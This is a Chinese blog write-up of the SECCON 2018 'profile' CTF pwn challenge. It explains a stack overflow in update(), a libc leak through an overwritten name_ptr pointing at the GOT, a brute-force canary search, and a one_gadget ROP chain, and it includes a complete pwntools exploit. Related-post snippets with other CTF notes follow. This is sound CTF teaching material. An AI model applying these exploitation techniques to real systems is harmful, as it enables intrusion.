pwn-seccon18-profile

最新推荐文章于 2022-10-21 22:34:41 发布
最新推荐文章于 2022-10-21 22:34:41 发布
阅读量293 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: ctf pwn seccon-2018 profile
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_25201379/article/details/83537631
本文介绍了一个C++程序中的栈溢出漏洞,利用update函数修改过长的message导致数组越界,覆盖name_ptr及返回地址。通过覆盖name_ptr指向got表地址,结合noPIE特性,实现libc基址泄露,再暴力搜索canary地址,最终利用one_gadget获得程序控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

栈溢出&暴力泄露栈地址

这个方法我做了一天,真是差劲

程序分析:

这题是用c++编写的程序,用ida打开很奇怪,一大串c++的特征,有点难看。但是功能很简单:

  1. 登陆:输入姓名,年龄和简介信息
  2. update:修改简介信息
  3. show:显示姓名  年龄 和 简介信息
  4. exit:退出程序

程序开启了canary,no PIE

程序对个人信息用一个结构体来维护,这个结构体保存在栈上:结构体和部分栈结构如下

info{
    char* message_ptr;
    int64 m1; //0xf
    char message[0x10]
    char* name_ptr;
    int64 m2; //0x8
    char name[0x8];
    int64 m3;
    int64 age;
}
canary
int64
int64
rbp
return_addr(__libc_start_main+240)

动态调试栈如下所示:

利用:

         在调试中发现,如果登陆时设定的name字符串的长度超过0x8,那么程序会分配一个堆块,并且将字符串存入堆块中,反之则将name字符串存放在栈上的结构体中,相应的,name_ptr可能会指向堆块或者栈。如果登陆时设定的message字符串的长度超过0x10,那么同样分配一个堆块来存放,并且name_ptr将指向堆块,反之指向栈上的结构体内部。

本方法在登陆时保证message_ptr和name_ptr均指向结构体内部,即栈地址。所以在登陆时输入的len(name)<=0x8 len(message)<=0xf

 

漏洞:

        update函数会修改message_ptr指向的message[0x10]的内容,并且没有任何size检查,可以导致数组越界,从而覆盖name_ptr,覆盖main函数的返回地址,导致栈溢出攻击。

过程:

  1. 利用update函数覆盖name_ptr指针为got表上的任意函数地址,因为no PIE,所以got表地址固定
  2. 然后用show函数打印出name_ptr指向地址的值,即got表上的值,获得libc基址
  3. 考虑泄露cannay的值,那么需要获得canary在栈上的地址。由于只能通过覆盖name_ptr来获得对应地址的内容,所以思考有什么地址记录栈的地址呢?
  4. 尝试从程序空间寻找记录栈地址的变量和从libc空间寻找记录栈地址的变量
pwndbg> searchmem 栈地址的高4个字节 map名

程序空间没有变量记录了栈地址信息,而libc中有一个叫"program_invocation_short_name"的变量记录了程序名在栈上的位置

  • 5.由于我们获得了libc基址,所以可以定位到这个变量在libc中的地址,利用步骤1,2获得上述变量记录的栈地址,但是发现这个栈地址与cannary的栈地址偏移不是固定的,经过观察其规律,发现它们的偏移在0x2500之内变化,所以考虑暴力寻找。

       首先将获取的栈地址a对齐:a = a&0xfffffffffffffff0(这里也可以是0xfffffffffffff000,因为发现canary距离a很远)

  • 6.循环利用1,2步骤,将name_ptr改写为上述的栈地址a,每次循环将a自减0x8,直到泄露出来的地址与(__libc_start_main+240)相等,那么就能够得到精确的栈地址。
  • 7.利用上步计算得到了cannary的栈地址,再次利用update函数溢出覆盖canary和返回地址为one_gadget

结果:

  • exp:
from pwn import *

p = process('./profile')
# p = remote('127.0.0.1',2080)
# p=remote("profile.pwn.seccon.jp",28553)
elf=ELF('./profile')
# context.log_level='debug'
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("./libc-2.23.so")

def login():
    p.recvuntil("Name >> ")
    p.sendline("x"*0x8)
    p.recvuntil("Age >> ")
    p.sendline("23")
    p.recvuntil("Message >> ")
    p.sendline("z"*0xe+'#')

def update(message):
    p.recvuntil(">> ")
    p.sendline("1")
    p.recvuntil("Input new message >> ")
    p.sendline(message)

def show(get_size):
    p.recvuntil(">> ")
    p.sendline("2")
    p.recvuntil("Name : ")
    res=u64(p.recv(get_size).ljust(8,'\0'))
    return res    


login()
update("a"*0x10+p64(elf.got['__libc_start_main']))

start_main=show(6)
libc.address=start_main-libc.symbols['__libc_start_main']

print("libc_base:"+hex(libc.address))

update("a"*0x10+p64(libc.address+0x3c53d0))


start=libc.symbols['__libc_start_main']+240
print("start+240: "+hex(start))

tmp = show(6)
stack_addr=tmp&0xfffffffffffff000

print("stack_addr:"+hex(stack_addr))
flag=0
for i in range(2000):
    update("a"*0x10+p64(stack_addr-i*8))
    
    tmp=show(6)
    
    print("i: "+str(i))
    print("current_stack: "+hex(stack_addr-i*8))
    print("tmp: "+hex(tmp))
    print("start: "+hex(start))
    if(tmp==start):
        flag=i
        # attach(p)
        break
canary_addr=stack_addr-flag*8-0x20+1
update("a"*0x10+p64(canary_addr))


canary=show(7)*0x100

print("canary: "+hex(canary))
one_shot=0x45216
payload="a"*0x10+p64(canary_addr-1-0x18)+p64(0x8)+'x'*0x8+p64(0)+p64(0x17)
payload+=p64(canary)+p64(0xdeadbeaf)+p64(0)+p64(0x4016b0)
pop_rax_pp_ret=0x1435B1
payload+=p64(libc.address+pop_rax_pp_ret)+p64(0)+p64(0)+p64(0)+p64(libc.address+one_shot)
update(payload)
attach(p)
p.recvuntil(">> ")
p.sendline("0")

p.interactive()

另一种泄露栈地址的方法:

因为name_ptr本来就指向栈上地址,所以只需要修改name_ptr的低一个字节,那么它还是指向栈地址,通过比较返回的信息,来判断准确的cannary栈地址,暴力循环次数远远小于我上面用到的方法!!!我的方法少则循环几十次,多则上千次。而这种仅仅需要几十次。还是太固执了。

Seccon CTF 2016 部分Writeup.md
Bendawang's Blog
12-15 2644
Seccon CTF 2016 部分Writeup
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 582
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
SECCON 2018的一道智能合约题目
Fly_鹏程万里
12-18 912
前言 周末抽时间整理了一下seccon的区块链的题目,当时没空打,现在想想还是挺遗憾的,其实这几道题考点并没有多少新颖的地方,不过做题的手法还是有点意思,所以在这里记录一下 Smart Gacha 这道题有两关,lv1还算简单,很多队伍都做出来了 lv1 题目描述如下 Toggle the "getItem" boolean value in "fair lottery contra...
HMI流水灯运行(xctf)
耐酸碱高温固化材料近距离传输研究
11-20 644
简单的程序,开始运行后会有一个跑马灯滚动。 反编译看源代码发现,跑马灯滚动三轮后有个短暂停顿,可以利用停顿间隔进行栈溢出。 from pwn import * import time context.log_level='debug' r = remote("220.249.52.133",51688) #r = process("./format",shell = True) #executes the binary r.recvuntil("\n\n") e = ELF("./format
netcon.h头文件
05-18
头文件netcon.h(包含网络接口的头文件)
Pwn入坑指南
子曰小玖的博客
01-17 1705
栈溢出原理 参考我之前发的一篇Windows栈溢出原理 还有brant师傅的《0day安全笔记》 解题过程 逆向和分析 这个过程就是IDA的使用和汇编代码的理解 IDA使用技巧: https://xz.aliyun.com/t/4205 getshell分两种情况: (1) 内存程序中有getshell函数[system("/bin/sh")]或指令时,直接调用/劫持。...
pwn-seccon2018-kindvm
sunrise的博客
10-30 378
漏洞:整数溢出 虚拟指令集分析: nop指令: 0x00 nop load指令: 0x01 + 寄存器号(0-6)+ 内存地址(2字节,小于0x3fc)这个偏移考虑负值,例如设置为0xfff0,读取时是uint类型,计算偏移却是int store指令: ...
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3512
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界 Pwn-guess
FUCKING12的博客
10-21 919
程序很奇怪,为什么要在这里面弄个stderr的指针,还没用,出于老油条的警觉,要仔细想想这里是否有兔子洞(doge),这里有个利用点,就是v4和v3只有0x10的距离,我们在比较的时候,就可以利用这个点,在v3输入0x10的垃圾数据后,后面就是stderr的地址,buf会和v4进行比较,那我们就可以一个字节一个字节的和stderr比较,如果对了,就执行后面的,没对,就重新输入,于是就可以爆破出stderr的地址。注意这个函数的 i 是在栈上的,我们可以通过输入v1来控制i的值,来达到栈溢出的目的,
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 3113
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
CTF泄漏libc基址的方法
liucc09的博客
01-05 4370
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2917
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
mmexport1755325166750.mp4
08-16
mmexport1755325166750.mp4
Go语言教程&案例&相关项目资源
08-16
Go语言教程&案例&相关项目资源
基于应力的多轴疲劳分析应用程序.zip
最新发布
08-16
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
### 生物质炉具现场测试污染物排放特征及减排效果评估
08-16
内容概要:该研究通过在黑龙江省某示范村进行24小时实地测试,比较了燃煤炉具与自动/手动进料生物质炉具的污染物排放特征。结果显示,生物质炉具相比燃煤炉具显著降低了PM2.5、CO和SO2的排放(自动进料分别降低41.2%、54.3%、40.0%;手动进料降低35.3%、22.1%、20.0%),但NOx排放未降低甚至有所增加。研究还发现,经济性和便利性是影响生物质炉具推广的重要因素。该研究不仅提供了实际排放数据支持,还通过Python代码详细复现了排放特征比较、减排效果计算和结果可视化,进一步探讨了燃料性质、动态排放特征、碳平衡计算以及政策建议。 适合人群:从事环境科学研究的学者、政府环保部门工作人员、能源政策制定者、关注农村能源转型的社会人士。 使用场景及目标:①评估生物质炉具在农村地区的推广潜力;②为政策制定者提供科学依据,优化补贴政策;③帮助研究人员深入了解生物质炉具的排放特征和技术改进方向;④为企业研发更高效的生物质炉具提供参考。 其他说明:该研究通过大量数据分析和模拟,揭示了生物质炉具在实际应用中的优点和挑战,特别是NOx排放增加的问题。研究还提出了多项具体的技术改进方向和政策建议,如优化进料方式、提高热效率、建设本地颗粒厂等,为生物质炉具的广泛推广提供了可行路径。此外,研究还开发了一个智能政策建议生成系统,可以根据不同地区的特征定制化生成政策建议,为农村能源转型提供了有力支持。
攻防世界pwn pwn-100
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值